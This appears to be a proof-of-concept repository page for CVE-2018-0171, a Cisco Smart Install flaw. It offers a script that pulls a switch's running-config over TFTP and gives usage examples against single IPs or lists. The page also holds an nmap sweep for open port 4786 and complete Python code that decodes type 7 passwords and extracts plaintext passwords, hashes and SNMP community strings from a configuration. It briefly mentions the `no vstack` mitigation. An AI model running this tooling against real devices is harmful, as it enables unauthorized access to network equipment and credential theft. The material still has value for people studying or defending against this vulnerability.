
CVE-2018-0171 PoC — Cisco IOS Software and IOS XE Software input validation vulnerability

Source
Associated Vulnerability
Title: Cisco IOS Software and IOS XE Software input validation vulnerability (CVE-2018-0171)
Description: A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: triggering a reload of the device; allowing the attacker to execute arbitrary code on the device; causing an indefinite loop on the affected device that triggers a watchdog crash. Cisco Bug IDs: CSCvg76186.
Description
Cisco SmartInstall Exploit [CVE-2018-0171]
Readme
# Cisco-Smart-Exploit
Cisco SmartInstall Exploit **CVE-2018-0171**

> Inspired from [C. Papathanasiou PoC](https://github.com/ChristianPapathanasiou/CiscoSmartInstallExploit)

This Python 3 script talks to TCP port 4786 on a Cisco device running Smart Install to exploit **CVE-2018-0171**. An attacker uses it to craft a Smart Install message, send it to the device, and retrieve the contents of the device's `running-config` over TFTP (hence the `tftpy` requirement). Smart Install is enabled by default on many Catalyst switches: `show vstack config` reports whether a device is acting as a Smart Install client, and `no vstack` in global configuration disables it, which is the mitigation Cisco recommends wherever the feature is not in use.

The Cisco Smart Exploit script can:  
- **Extract** the running-config file
- **Parse** and **decode** type 7 passwords (`password 7 ...`, a reversible encoding rather than a hash; type 5/8/9 `secret` values are one-way and are only reported)
- **Parse** plaintext passwords (`password 0 ...` or no type prefix)
- **Parse** all SNMP **community strings** and their RO/RW mode

![Usage Script](assets/screen.png)
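The parsing and type 7 decoding described in the feature list above, and used by the `-c CONFIG` standalone mode, as an added example written for this page. It is not code from `cisco-se.py` or from the C. Papathanasiou PoC: it decodes type 7 in pure Python instead of shelling out to `c7decrypt`, the function names (`decode_type7`, `parse_running_config`) are my own, and the running-config it runs over is constructed for the example (hostname, usernames, community strings and the `$1$...` placeholder hashes are all made up, not captured from a device).

```python
import re

# Cisco "password 7" is a reversible XOR encoding, not a hash. The first two
# characters are a decimal offset into this fixed key; each following pair of
# hex digits is one cleartext byte XORed with the next key character.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(enc):
    """Return the cleartext of a type 7 string such as '094F471A1A0A'."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("not a type 7 string: %r" % enc)
    seed = int(enc[:2])
    body = bytes.fromhex(enc[2:])
    return "".join(chr(b ^ ord(XLAT[(seed + i) % len(XLAT)])) for i, b in enumerate(body))


def encode_type7(plain, seed=9):
    """Inverse of decode_type7 (IOS picks the seed itself); handy for fixtures."""
    out = ["%02d" % seed]
    for i, b in enumerate(plain.encode()):
        out.append("%02X" % (b ^ ord(XLAT[(seed + i) % len(XLAT)])))
    return "".join(out)


# Patterns for the lines that leak credentials in a running-config.
USER_RE = re.compile(r"^username\s+(\S+)\s+(?:.*?\s)?(password|secret)\s+(?:(\d)\s+)?(\S+)")
ENABLE_RE = re.compile(r"^enable\s+(password|secret)\s+(?:(\d)\s+)?(\S+)")
LINE_PW_RE = re.compile(r"^\s+password\s+(?:(\d)\s+)?(\S+)")
SNMP_RE = re.compile(r"^snmp-server\s+community\s+(\S+)(?:\s+(RO|RW))?")


def _cred(where, kind, ptype, value):
    """Classify one stored credential by its type prefix."""
    if ptype in (None, "0"):
        label, plain = "plaintext", value
    elif ptype == "7":
        label, plain = "type7", decode_type7(value)
    else:
        # 5 = MD5-crypt, 8 = PBKDF2-SHA256, 9 = scrypt: one-way, crack offline only
        label, plain = "type" + ptype, None
    return {"where": where, "kind": kind, "type": label, "stored": value, "plaintext": plain}


def parse_running_config(text):
    """Pull credentials and SNMP community strings out of a running-config."""
    creds, communities = [], []
    context = None  # the 'line ...' block we are inside, if any
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("!"):
            continue
        if not line[0].isspace():
            context = line if line.startswith("line ") else None
        m = USER_RE.match(line)
        if m:
            user, kind, ptype, value = m.groups()
            creds.append(_cred("username " + user, kind, ptype, value))
            continue
        m = ENABLE_RE.match(line)
        if m:
            creds.append(_cred("enable", *m.groups()))
            continue
        m = SNMP_RE.match(line)
        if m:
            # IOS treats an unqualified community string as read-only
            communities.append({"community": m.group(1), "mode": m.group(2) or "RO"})
            continue
        m = LINE_PW_RE.match(line) if context else None
        if m:
            creds.append(_cred(context, "password", *m.groups()))
    return {"credentials": creds, "communities": communities}


# Constructed sample (not captured from a real device); the type 5 values are
# placeholders that only need to look like MD5-crypt to the parser.
SAMPLE_CONFIG = """\
!
hostname edge-sw01
!
enable secret 5 $1$abcd$ZZZZZZZZZZZZZZZZZZZZZZ
enable password 7 094F471A1A0A
!
username admin privilege 15 password 7 0518030C33495A
username netops password 0 Summer2024
username audit secret 5 $1$wxyz$YYYYYYYYYYYYYYYYYYYYYY
!
snmp-server community public RO
snmp-server community pr1vat3 RW
!
line con 0
 password 7 094F471A1A0A
 login
line vty 0 4
 password telnet123
 login
!
end
"""

if __name__ == "__main__":
    result = parse_running_config(SAMPLE_CONFIG)
    for c in result["credentials"]:
        print("%-16s %-8s %-9s %s" % (c["where"], c["kind"], c["type"], c["plaintext"] or c["stored"]))
    for s in result["communities"]:
        print("snmp community   %s (%s)" % (s["community"], s["mode"]))
```

The parser deliberately keeps type 5/8/9 `secret` values as opaque strings with `plaintext` set to `None`: those are real one-way hashes and belong in an offline cracking job, whereas every `password 7` and every plaintext `password` line is an immediate credential. Tracking the enclosing `line con`/`line vty` block matters because the indented `password` lines there carry no username and would otherwise be misattributed.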

## Requirements

Here is the list of requirements to use the script:

- `tftpy==0.8.2`
- `c7decrypt` for secret 7 decryption
    - `gem install c7decrypt`

## Usage

```bash
 __     __   __   __      __              __  ___     ___      __        __    ___
/  ` | /__` /  ` /  \    /__`  |\/|  /\  |__)  |     |__  \_/ |__) |    /  \ |  |
\__, | .__/ \__, \__/    .__/  |  | /~~\ |  \  |     |___ / \ |    |___ \__/ |  |
by @AlrikRr

usage: cisco-se.py [-h] (-i IP | -f FILE | -c CONFIG)

optional arguments:
  -h, --help  show this help message and exit
  -i IP       Single IP Address
  -f FILE     File that contains IP list
  -c CONFIG   running-config File standalone
```
Examples:
```bash
python3 cisco-se.py -i 192.168.10.1

python3 cisco-se.py -f ip_list.txt

python3 cisco-se.py -c running-config.txt
```

### Nmap Output IP list

For the `-f FILE` option, here is an example using nmap. Matching the `4786/open` port entry in the grepable output, rather than the `Status: Up` line, keeps the list limited to hosts where the port was actually found open (with `-Pn` every host is assumed to be up):  

```bash
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/4786\/open/{print $2}' > ip_list.txt
```

## Todo List
- [ ] Handle the timeout error for some IPs during `client.download()`
File Snapshot

```
[4.0K] /data/pocs/2af71cb39e58b352e61c3acd67dceaceb429016d
├── [4.0K] assets
│   └── [ 88K] screen.png
├── [7.0K] cisco-se.py
├── [1.0K] LICENSE
├── [1.7K] README.md
└── [  12] requirements.txt

1 directory, 5 files
```